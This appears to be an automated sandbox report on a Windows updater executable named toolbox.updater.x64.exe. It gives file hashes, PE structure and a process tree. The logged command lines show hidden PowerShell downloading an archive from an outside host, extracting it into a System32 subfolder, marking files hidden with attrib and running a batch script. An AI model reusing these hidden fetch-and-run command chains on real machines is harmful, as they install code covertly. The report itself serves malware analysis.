            • Win64 Executable GUI (202006/5) 92.65%
            • Win64 Executable (generic) (12005/4) 5.51%
            • Generic Win/DOS Executable (2004/3) 0.92%
            • DOS Executable Generic (2002/1) 0.92%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:toolbox.updater.x64.exe
            File size:324096
            MD5:bde4351613c5ebf5c4b30729ab50acd0
            SHA1:13ebbf56e7d93482712dcd4c6b6866a40e5560db
            SHA256:0cf73f9d6f6ca82b35c79ea947026f3f1c87d6dc12bf6591357ba417fdebe3df
            SHA512:59b7c854870d64ccc4b06846cc7cd9e09cd6e1e17d597b925e7185ec42bde4512cfe6024ca3ca8a919131fd0e7cfd35dd4cb96982772c7d7ce74f89250a6df25
            SSDEEP:3072:RUhDEEaDmTeTfJ62RJCQIWH77Qz1Ug8KI1N3jO6TpPI3P:24PfFJJP+b0XTOP
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....L.^.........."......v...z........... ....@...... ....................... ............@................................

            File Icon

            Icon Hash:70e8e6fe9afcf811

            Static PE Info

            General

            Entrypoint:0x400000
            Entrypoint Section:
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x5E014C99 [Mon Dec 23 23:24:09 2019 UTC]
            TLS Callbacks:
            CLR (.Net) Version:v4.0.30319
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:
            Instruction
            dec ebp
            pop edx
            nop
            add byte ptr [ebx], al
            add byte ptr [eax], al
            add byte ptr [eax+eax], al
            add byte ptr [eax], al
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x378fc.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000x175a00x17600False0.423138786765data6.05201800015IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rsrc0x1a0000x378fc0x37a00False0.298951018258data5.05375331113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountry
            RT_ICON0x1a3580x5156PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States
            RT_ICON0x1f4b00x267ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
            RT_ICON0x21b300x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
            RT_ICON0x323580x94a8dataEnglishUnited States
            RT_ICON0x3b8000x5488dataEnglishUnited States
            RT_ICON0x40c880x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4043309055, next used block 4294967055EnglishUnited States
            RT_ICON0x44eb00x25a8dataEnglishUnited States
            RT_ICON0x474580x10a8dataEnglishUnited States
            RT_ICON0x485000x988dataEnglishUnited States
            RT_ICON0x48e880x468GLS_BINARY_LSB_FIRSTEnglishUnited States
            RT_RCDATA0x492f00x1474data
            RT_RCDATA0x4a7640x6723data
            RT_GROUP_ICON0x50e880x92dataEnglishUnited States
            RT_VERSION0x50f1c0x330data
            RT_MANIFEST0x5124c0x6afXML 1.0 document, ASCII text, with CRLF line terminators
            DescriptionData
            Translation0x0000 0x04b0
            LegalCopyrightCopyright (c) 2020 All rights reserved
            Assembly Version5.0.34.0
            InternalName
            FileVersion1.8.36.24
            CompanyNameGHOST SPECTRE
            Comments
            ProductNameGHOST UPDATER
            ProductVersion1.8.36.24
            FileDescriptionGHOST SPECTRE
            OriginalFilenameGHOST UPDATER

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            No network behavior found

            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            • File
            • Registry

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: toolbox.updater.x64.exe PID: 7160 Parent PID: 5844

            Function LogsAmsi Logs

            General

            Start time:18:54:49
            Start date:26/11/2020
            Path:C:\Users\user\Desktop\toolbox.updater.x64.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\toolbox.updater.x64.exe'
            Imagebase:0xa0000
            File size:324096 bytes
            MD5 hash:BDE4351613C5EBF5C4B30729AB50ACD0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:low
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Timing Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            Process Token Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: conhost.exe PID: 5720 Parent PID: 7160

            Function Logs

            General

            Start time:18:54:54
            Start date:26/11/2020
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff724c50000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Timing Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: powershell.exe PID: 496 Parent PID: 7160

            Function LogsAmsi Logs

            General

            Start time:18:54:54
            Start date:26/11/2020
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
            Imagebase:0x7ff7bedd0000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Powershell Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Timing Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            Process Token Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: powershell.exe PID: 6136 Parent PID: 7160

            Function LogsAmsi Logs

            General

            Start time:18:55:01
            Start date:26/11/2020
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
            Imagebase:0x7ff7bedd0000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Powershell Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Timing Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            Process Token Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: attrib.exe PID: 6664 Parent PID: 7160

            Function Logs

            General

            Start time:18:55:08
            Start date:26/11/2020
            Path:C:\Windows\System32\attrib.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
            Imagebase:0x7ff6b9a80000
            File size:21504 bytes
            MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: attrib.exe PID: 6692 Parent PID: 7160

            Function Logs

            General

            Start time:18:55:08
            Start date:26/11/2020
            Path:C:\Windows\System32\attrib.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US
            Imagebase:0x7ff6b9a80000
            File size:21504 bytes
            MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: powershell.exe PID: 6728 Parent PID: 7160

            Function LogsAmsi Logs

            General

            Start time:18:55:09
            Start date:26/11/2020
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd
            Imagebase:0x7ff7bedd0000
            File size:447488 bytes
            MD5 hash:95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Powershell Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Timing Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            Process Token Activities

            Show Windows behavior

            LPC Port Activities

            Analysis Process: conhost.exe PID: 6736 Parent PID: 6728

            Function Logs

            General

            Start time:18:55:09
            Start date:26/11/2020
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff724c50000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Show Windows behavior

            File Activities

            Show Windows behavior

            Section Activities

            Show Windows behavior

            Registry Activities

            Show Windows behavior

            Mutex Activities

            Show Windows behavior

            Process Activities

            Show Windows behavior

            Thread Activities

            Show Windows behavior

            Memory Activities

            Show Windows behavior

            System Activities

            Show Windows behavior

            Windows UI Activities

            Show Windows behavior

            LPC Port Activities

            Disassembly

            Code Analysis

            Analysis Process: toolbox.updater.x64.exe PID: 7160 Parent PID: 5844 toolbox.updater.x64.exeCOMMON

            Execution Graph

            Execution Coverage

            Dynamic/Packed Code Coverage

            Signature Coverage

            Execution Coverage:16.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:57.1%
            Total number of Nodes:7
            Total number of Limit Nodes:2

            Graph

            Show Legend
            Hide Nodes/Edges
            execution_graph 6152 7ffa35ba59a4 6153 7ffa35ba64bb 6152->6153 6154 7ffa35ba59d8 6152->6154 6154->6153 6157 7ffa35ba0260 6154->6157 6156 7ffa35ba6477 6159 7ffa35ba0269 WNetGetConnectionW 6157->6159 6160 7ffa35ba4608 6159->6160 6160->6156

            Executed Functions

            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 7ffa35ba24d0-7ffa35ba24df call 7ffa35ba0290 3 7ffa35ba24e5-7ffa35ba24ec 0->3 4 7ffa35ba2c98-7ffa35ba2c9f 0->4 5 7ffa35ba2544-7ffa35ba2547 3->5 6 7ffa35ba24ee-7ffa35ba250e 3->6 7 7ffa35ba2ca5-7ffa35ba2ce9 4->7 8 7ffa35ba2d6a-7ffa35ba2d71 4->8 5->4 10 7ffa35ba254d-7ffa35ba255a 5->10 25 7ffa35ba2514-7ffa35ba2542 6->25 26 7ffa35ba3c3e-7ffa35ba3c56 6->26 33 7ffa35ba2ceb-7ffa35ba2d10 7->33 34 7ffa35ba2d4a-7ffa35ba2d65 7->34 11 7ffa35ba2d73 call 7ffa35ba0310 8->11 12 7ffa35ba2d80-7ffa35ba2d87 8->12 19 7ffa35ba25bb-7ffa35ba2600 10->19 20 7ffa35ba255c-7ffa35ba25b0 10->20 21 7ffa35ba2d78-7ffa35ba2d7a 11->21 15 7ffa35ba2ecd-7ffa35ba2f02 12->15 16 7ffa35ba2d8d-7ffa35ba2e1f 12->16 46 7ffa35ba2f95-7ffa35ba2faa 15->46 47 7ffa35ba2f08-7ffa35ba2f40 call 7ffa35ba03d8 15->47 99 7ffa35ba2e79-7ffa35ba2ec9 16->99 100 7ffa35ba2e21-7ffa35ba2e74 16->100 43 7ffa35ba2602-7ffa35ba2603 19->43 44 7ffa35ba2608-7ffa35ba264d 19->44 20->19 21->12 24 7ffa35ba3172-7ffa35ba3187 21->24 25->5 25->10 41 7ffa35ba3c58-7ffa35ba3c9f 26->41 42 7ffa35ba3ca0-7ffa35ba3cab 26->42 33->8 63 7ffa35ba2d12-7ffa35ba2d48 33->63 34->24 41->42 43->44 83 7ffa35ba2655-7ffa35ba268f 44->83 84 7ffa35ba264f-7ffa35ba2650 44->84 52 7ffa35ba2fac-7ffa35ba2fb3 call 7ffa35ba0320 46->52 53 7ffa35ba2fce-7ffa35ba2fd5 46->53 86 7ffa35ba2f42-7ffa35ba2f89 47->86 87 7ffa35ba2f8e 47->87 52->53 75 7ffa35ba2fb5-7ffa35ba2fbd call 7ffa35ba1768 52->75 61 7ffa35ba2fd7-7ffa35ba2fdf call 7ffa35ba1768 53->61 62 7ffa35ba302e-7ffa35ba3035 53->62 61->62 80 7ffa35ba2fe1-7ffa35ba3029 61->80 66 7ffa35ba3037-7ffa35ba303e call 7ffa35ba0320 62->66 67 7ffa35ba3059-7ffa35ba3060 62->67 63->34 66->67 97 7ffa35ba3040-7ffa35ba3048 call 7ffa35ba1760 66->97 71 7ffa35ba3062-7ffa35ba3069 67->71 72 7ffa35ba306f-7ffa35ba3080 call 7ffa35ba1760 call 7ffa35ba1758 67->72 71->72 81 7ffa35ba3188-7ffa35ba31cd call 7ffa35ba1660 call 7ffa35ba1560 71->81 116 7ffa35ba3082-7ffa35ba30cb 72->116 117 7ffa35ba30d0-7ffa35ba30d3 72->117 75->53 103 7ffa35ba2fbf call 7ffa35ba1780 75->103 80->24 146 7ffa35ba3229-7ffa35ba32c4 call 7ffa35ba15b0 call 7ffa35ba0220 call 7ffa35ba0250 call 7ffa35ba0230 call 7ffa35ba0240 81->146 147 7ffa35ba31cf-7ffa35ba3224 81->147 133 7ffa35ba26dc-7ffa35ba275d 83->133 134 7ffa35ba2691-7ffa35ba26da 83->134 84->83 145 7ffa35ba3c08-7ffa35ba3c0b 86->145 87->46 97->67 115 7ffa35ba304a-7ffa35ba3052 call 7ffa35ba1778 97->115 99->15 100->24 118 7ffa35ba2fc4-7ffa35ba2fc7 103->118 115->67 116->24 121 7ffa35ba3125-7ffa35ba3128 117->121 122 7ffa35ba30d5-7ffa35ba30d8 117->122 118->53 121->81 132 7ffa35ba312a-7ffa35ba316d 121->132 122->121 130 7ffa35ba30da-7ffa35ba3123 122->130 130->24 132->24 184 7ffa35ba2763-7ffa35ba2767 133->184 185 7ffa35ba28eb-7ffa35ba292c 133->185 134->133 150 7ffa35ba3c2d-7ffa35ba3c3d 145->150 191 7ffa35ba34fa-7ffa35ba38be call 7ffa35ba02a0 call 7ffa35ba02c0 146->191 192 7ffa35ba32ca-7ffa35ba32ed 146->192 147->145 186 7ffa35ba2769-7ffa35ba276f 184->186 187 7ffa35ba2771-7ffa35ba2772 184->187 202 7ffa35ba2931-7ffa35ba2a0c call 7ffa35ba0280 185->202 190 7ffa35ba2777-7ffa35ba27d6 186->190 187->190 211 7ffa35ba2869-7ffa35ba28a1 190->211 212 7ffa35ba27dc-7ffa35ba2814 190->212 267 7ffa35ba38c0-7ffa35ba390a 191->267 204 7ffa35ba32f5-7ffa35ba331a 192->204 270 7ffa35ba2a15-7ffa35ba2a19 202->270 271 7ffa35ba2a0e-7ffa35ba2a13 202->271 218 7ffa35ba338b-7ffa35ba3391 204->218 219 7ffa35ba331c-7ffa35ba331e 204->219 211->26 241 7ffa35ba28a7-7ffa35ba28e9 211->241 212->26 242 7ffa35ba281a-7ffa35ba284d 212->242 223 7ffa35ba3395-7ffa35ba3399 218->223 220 7ffa35ba339a-7ffa35ba33a4 219->220 221 7ffa35ba3320 219->221 233 7ffa35ba33a5-7ffa35ba33f8 220->233 224 7ffa35ba3322 221->224 225 7ffa35ba3324 221->225 223->220 224->225 225->223 230 7ffa35ba3326-7ffa35ba3329 225->230 230->233 234 7ffa35ba332b 230->234 233->267 239 7ffa35ba332d-7ffa35ba3336 234->239 240 7ffa35ba336f-7ffa35ba3389 234->240 240->218 241->202 242->26 258 7ffa35ba2853-7ffa35ba2864 242->258 258->202 280 7ffa35ba3913-7ffa35ba3917 267->280 281 7ffa35ba390c-7ffa35ba3911 267->281 274 7ffa35ba2a1c-7ffa35ba2aa5 270->274 271->274 311 7ffa35ba2b92-7ffa35ba2c44 274->311 312 7ffa35ba2aab-7ffa35ba2aad 274->312 282 7ffa35ba391a-7ffa35ba3938 280->282 281->282 288 7ffa35ba3997-7ffa35ba39ca 282->288 289 7ffa35ba393a-7ffa35ba395a 282->289 302 7ffa35ba3adc-7ffa35ba3b55 call 7ffa35ba15d0 288->302 303 7ffa35ba39d0-7ffa35ba39d3 288->303 289->26 298 7ffa35ba3960-7ffa35ba3990 289->298 298->288 319 7ffa35ba3992 298->319 349 7ffa35ba3b57-7ffa35ba3b5a call 7ffa35ba1788 302->349 350 7ffa35ba3b5f-7ffa35ba3b63 302->350 306 7ffa35ba39d5-7ffa35ba3a19 303->306 307 7ffa35ba3a1b-7ffa35ba3a5b 303->307 336 7ffa35ba3a5f-7ffa35ba3a71 306->336 307->336 379 7ffa35ba2c46-7ffa35ba2c87 311->379 380 7ffa35ba2c8c-7ffa35ba2c93 311->380 317 7ffa35ba2ae3-7ffa35ba2b10 312->317 318 7ffa35ba2aaf-7ffa35ba2ae1 312->318 331 7ffa35ba2b15-7ffa35ba2b27 317->331 318->331 319->288 331->26 335 7ffa35ba2b2d-7ffa35ba2b8c 331->335 335->311 335->312 336->26 339 7ffa35ba3a77-7ffa35ba3ad6 336->339 339->302 339->303 349->350 354 7ffa35ba3b65-7ffa35ba3b68 call 7ffa35ba1790 350->354 355 7ffa35ba3b6e-7ffa35ba3b72 350->355 366 7ffa35ba3b6d 354->366 357 7ffa35ba3b74-7ffa35ba3b80 call 7ffa35ba03e8 355->357 358 7ffa35ba3b81-7ffa35ba3bac 355->358 357->358 375 7ffa35ba3bb2-7ffa35ba3bbc 358->375 366->355 376 7ffa35ba3bd9-7ffa35ba3c06 375->376 377 7ffa35ba3bbe-7ffa35ba3bd8 375->377 376->150 377->376 379->145 380->145
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID: @$@$BC373ACA27924EBEA29D2A22E348ACB4$\
            • API String ID: 0-3488528484
            • Opcode ID: e22f365055d2d58ca011303b8da2d6c5bd92c4951effeb9b613869d4417d2d22
            • Instruction ID: de8d31b0916142247a676bd3510a5831d043539e828f1532cc0935f61f1d8d5f
            • Opcode Fuzzy Hash: e22f365055d2d58ca011303b8da2d6c5bd92c4951effeb9b613869d4417d2d22
            • Instruction Fuzzy Hash: 5BF27E30A0890A8FDF98EF1CC495EA577E1FB69700F1485A9E04EC72A6DE25EC45CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 460 7ffa35ba59a4-7ffa35ba59d2 461 7ffa35ba59d8-7ffa35ba59f3 460->461 462 7ffa35ba64bb-7ffa35ba6580 460->462 461->462 463 7ffa35ba59f9-7ffa35ba5a12 461->463 474 7ffa35ba6582 462->474 475 7ffa35ba6588-7ffa35ba65a5 462->475 463->462 464 7ffa35ba5a18-7ffa35ba5acc 463->464 478 7ffa35ba5add-7ffa35ba5ae5 464->478 479 7ffa35ba5ace-7ffa35ba5ad7 464->479 474->475 480 7ffa35ba5ae7 478->480 481 7ffa35ba5aee-7ffa35ba5af1 478->481 479->478 480->481 482 7ffa35ba5af3 481->482 483 7ffa35ba5afa-7ffa35ba5afd 481->483 482->483 484 7ffa35ba5b06-7ffa35ba5b09 483->484 485 7ffa35ba5aff 483->485 486 7ffa35ba5b12-7ffa35ba5b15 484->486 487 7ffa35ba5b0b 484->487 485->484 488 7ffa35ba5b17 486->488 489 7ffa35ba5b1e-7ffa35ba5b24 486->489 487->486 488->489 490 7ffa35ba5b26 489->490 491 7ffa35ba5b2d-7ffa35ba5b75 489->491 490->491 491->462 494 7ffa35ba5b7b-7ffa35ba5c2e 491->494 505 7ffa35ba5c5e-7ffa35ba5cf5 494->505 506 7ffa35ba5c30-7ffa35ba5c57 494->506 515 7ffa35ba5d25-7ffa35ba5da8 505->515 516 7ffa35ba5cf7-7ffa35ba5d1e 505->516 506->505 523 7ffa35ba5dd8-7ffa35ba5e5b 515->523 524 7ffa35ba5daa-7ffa35ba5dd1 515->524 516->515 531 7ffa35ba5e8b-7ffa35ba5f0e 523->531 532 7ffa35ba5e5d-7ffa35ba5e84 523->532 524->523 539 7ffa35ba5f3e-7ffa35ba5f8c 531->539 540 7ffa35ba5f10-7ffa35ba5f37 531->540 532->531 545 7ffa35ba5ffd-7ffa35ba6005 539->545 546 7ffa35ba5f8e-7ffa35ba5f90 539->546 540->539 547 7ffa35ba6007-7ffa35ba600a 545->547 548 7ffa35ba5f92 546->548 549 7ffa35ba600c-7ffa35ba600d 546->549 547->549 550 7ffa35ba5f94 548->550 551 7ffa35ba5f96 548->551 552 7ffa35ba603d-7ffa35ba60c0 549->552 553 7ffa35ba600f-7ffa35ba6010 549->553 550->551 551->547 555 7ffa35ba5f98-7ffa35ba5f9b 551->555 571 7ffa35ba60c2-7ffa35ba60e9 552->571 572 7ffa35ba60f0-7ffa35ba6173 552->572 556 7ffa35ba6017-7ffa35ba6036 553->556 555->556 558 7ffa35ba5f9d 555->558 556->552 559 7ffa35ba5f9f-7ffa35ba5fae call 7ffa35ba0300 558->559 560 7ffa35ba5fe1-7ffa35ba5ffc 558->560 565 7ffa35ba5fb3-7ffa35ba5fe0 559->565 560->545 565->560 571->572 579 7ffa35ba61a3-7ffa35ba6226 572->579 580 7ffa35ba6175-7ffa35ba619c 572->580 587 7ffa35ba6256-7ffa35ba62d9 579->587 588 7ffa35ba6228-7ffa35ba624f 579->588 580->579 595 7ffa35ba6309-7ffa35ba638c 587->595 596 7ffa35ba62db-7ffa35ba6302 587->596 588->587 603 7ffa35ba63bc-7ffa35ba643f 595->603 604 7ffa35ba638e-7ffa35ba63b5 595->604 596->595 611 7ffa35ba646f-7ffa35ba6472 call 7ffa35ba0260 603->611 612 7ffa35ba6441-7ffa35ba6468 603->612 604->603 615 7ffa35ba6477-7ffa35ba6484 611->615 612->611
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID: 073E77D0D536421AA25BF60B16746B88
            • API String ID: 0-3873619420
            • Opcode ID: a9422ffb86e185718b2b60d2a1612f3eca9fc38168a3c4f046af1c972298d832
            • Instruction ID: aee08a11022d8164648924e0297801b71cb5648122bf8014559c185ddfe0b6f2
            • Opcode Fuzzy Hash: a9422ffb86e185718b2b60d2a1612f3eca9fc38168a3c4f046af1c972298d832
            • Instruction Fuzzy Hash: 5A828030A08A098FCB88EF28D4E4E6577E1FB69315B5456ADD04FC72A2DE34E845DF81
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule

            Control-flow Graph

            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 037af2729bae873d3bdfeaa17bacc88ae4b1deb523b2f268e8005cc3e2ef13c9
            • Instruction ID: 0a7f914c47aa6458c60c81b75b00010f84d1450c023322f662533860b78b9076
            • Opcode Fuzzy Hash: 037af2729bae873d3bdfeaa17bacc88ae4b1deb523b2f268e8005cc3e2ef13c9
            • Instruction Fuzzy Hash: F8918E30508A8D8FDBA8DF18D8557F97BA1EF5A300F10816ED84DC7292DE75A885CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID: Connection
            • String ID:
            • API String ID: 1722446006-0
            • Opcode ID: dfe84d5632786c4db75194d9cb5e5c93391656e597622a0bc965de9d4620c4f5
            • Instruction ID: f2ddbfedc42679682a0ca03d0dd8b78411b53d2cb44db60b4d222bafeec0d868
            • Opcode Fuzzy Hash: dfe84d5632786c4db75194d9cb5e5c93391656e597622a0bc965de9d4620c4f5
            • Instruction Fuzzy Hash: 1D818230508A8D4FDB69DF18D8567E93BE1EF5A310F04816ED84DC7292DF75A845CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 685 7ffa35c28800-7ffa35c2887f 686 7ffa35c28881-7ffa35c28894 685->686 687 7ffa35c28896 685->687 689 7ffa35c28898-7ffa35c2889a 686->689 687->689 690 7ffa35c2894a-7ffa35c28954 689->690 691 7ffa35c288a0-7ffa35c288a3 689->691 693 7ffa35c28963-7ffa35c28981 690->693 694 7ffa35c28956-7ffa35c28962 690->694 691->690 692 7ffa35c288a9-7ffa35c288b1 691->692 695 7ffa35c288c1 692->695 696 7ffa35c288b3-7ffa35c288bd 692->696 707 7ffa35c28986-7ffa35c289a6 693->707 700 7ffa35c288c6-7ffa35c288d3 695->700 698 7ffa35c288dd-7ffa35c28915 696->698 699 7ffa35c288bf 696->699 698->707 711 7ffa35c28917-7ffa35c28932 698->711 699->700 700->698 705 7ffa35c288d5-7ffa35c288db 700->705 705->698 713 7ffa35c28937-7ffa35c28949 711->713
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID: Xm5
            • API String ID: 0-2004575312
            • Opcode ID: 55c1b5465ce6aec410af6591d982c413b2d5b81d7c73a0d50c2a4fd1d85953f9
            • Instruction ID: a32b1a8c46992557b2a577ccaf95aebf256f366f85ad2c9b850321365d70058e
            • Opcode Fuzzy Hash: 55c1b5465ce6aec410af6591d982c413b2d5b81d7c73a0d50c2a4fd1d85953f9
